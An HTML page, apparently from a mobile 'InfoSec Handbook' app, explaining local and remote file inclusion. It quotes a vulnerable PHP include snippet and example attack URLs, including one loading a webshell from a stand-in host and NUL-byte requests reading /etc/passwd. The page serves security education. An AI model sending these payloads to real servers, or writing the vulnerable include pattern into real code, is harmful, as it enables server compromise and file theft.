/assets/www/lrfi.html
HTML | 186 lines | 185 code | 1 blank | 0 comment | 0 complexity | 9aaec724ffe546ebc0af2b911cf7e4a9 MD5 | raw file
- <!DOCTYPE html>
- <html>
- <head>
- <meta charset="utf-8" />
- <meta name="viewport" content="width=device-width, initial-scale=1" />
- <title>
- </title>
- <link rel="stylesheet" href="jquery.mobile-1.1.0.min.css" />
- <style>
- /* App custom styles */
- </style>
- <script src="jquery-1.7.2.min.js">
- </script>
- <script src="jquery.mobile-1.1.0.min.js">
- </script>
-
- <div data-role="page" id="page33">
- <div data-theme="a" data-role="header">
- </div>
- <div data-theme="a" data-role="header" data-position="fixed">
- <h1>
- InfoSec Handbook
- </h1>
- <div data-role="navbar" data-iconpos="left">
- <ul>
- </ul>
- </div>
- </div>
- <div data-role="content">
- <div>
- <h2>
- Local/Remote File Include
- </h2>
- <h3>
- Local/Remote File Include
- </h3>
- <h4>
- Taken from
- <a href="https://en.wikipedia.org/wiki/Local_File_Inclusion">
- wikipedia.org/lfi
- </a>
- <br />
- <br />
- Remote File Inclusion (RFI) is a type of vulnerability most often found
- on websites. It allows an attacker to include a remote file, usually through
- a script on the web server. The vulnerability occurs due to the use of
- user-supplied input without proper validation. This can lead to something
- as minimal as outputting the contents of the file, but depending on the
- severity, to list a few it can lead to:
- <br />
- <br />
- Code execution on the web server
- <br />
- Code execution on the client-side such as JavaScript which can lead to
- other attacks such as cross site scripting (XSS).
- <br />
- Denial of Service (DoS)
- <br />
- Data Theft/Manipulation
- <br />
- <br />
- </h4>
- <h3>
- Example:
- </h3>
- <h4>
- Consider this PHP script (which includes a file specified by request):
- <br />
- <br />
- (All > and < have been replaced with * due to formatting issues)
- <br />
- <br />
- <br />
- *?php
- <br />
- $color = 'blue';
- <br />
- if (isset( $_GET['COLOR'] ) )
- <br />
- $color = $_GET['COLOR'];
- <br />
- include( $color . '.php' );
- <br />
- ?*
- <br />
- <br />
- <br />
- *form method="get"*
- <br />
- *select name="COLOR"*
- <br />
- *option value="red"*red*/option*
- <br />
- *option value="blue"*blue*/option*
- <br />
- */select*
- <br />
- *input type="fix file: *
- <br />
- */form*
- <br />
- <br />
- The developer intended only blue.php and red.php to be used as options.
- But as anyone can easily insert arbitrary values in COLOR, it is possible
- to inject code from files:
- <br />
- <br />
- /vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
- <br />
- Injects a remotely hosted file containing a malicious code.
- <br />
- <br />
- /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
- <br />
- Executes code from an already uploaded file called exploit.php (local
- file inclusion vulnerability)
- <br />
- <br />
- /vulnerable.php?COLOR=C:\\notes.txt%00
- <br />
- Example using NUL meta character to remove the .php suffix, allowing access
- to files other than .php. (With magic_quotes_gpc enabled this limits the
- attack by escaping special characters, this disables the use of the NUL
- terminator)
- <br />
- <br />
- /vulnerable.php?COLOR=/etc/passwd%00
- <br />
- Allows an attacker to read the contents of the passwd file on a UNIX system
- directory traversal.
- </h4>
- <h3>
- Links
- </h3>
- <h4>
- <li>
- <a href="http://pastie.org/840199">
- http://pastie.org/840199
- </a>
- </li>
- <li>
- <a href="http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/">
- Exploiting PHP File Inclusion – Overview « Reiners’ Weblog
- </a>
- </li>
- <li>
- <a href="http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter">
- LFI..Code Exec..Remote Root!
- </a>
- </li>
- <li>
- <a href="http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/">
- Local File Inclusion – Tricks of the Trade « Neohapsis Labs
- </a>
- </li>
- <li>
- <span>
- <a href="http://www.digininja.org/blog/when_all_you_can_do_is_read.php">
- Blog, When All You Can Do Is Read - DigiNinja
- </a>
- </span>
- </li>
- </h4>
- <br />
- </div>
- <a data-role="button" data-inline="true" data-rel="back" data-transition="fade" data-theme="a" href="#page1" data-icon="home" data-iconpos="left">
- Back
- </a>
- </div>
- <div data-theme="a" data-role="footer" data-position="fixed">
- <h3>
- <a href="https://play.google.com/store/apps/details?id=my.first.app">Rate This App!</a>
- </h3>
- </div>
- </div>
-
-
- <link rel="stylesheet" href="master.css" type="text/css" media="screen" title="no title">
- <script type="text/javascript" charset="utf-8" src="phonegap-1.4.0.js"></script>
- <script type="text/javascript" charset="utf-8" src="main.js"></script>
- </head>
- <body>
-
-
- </body>
- </html>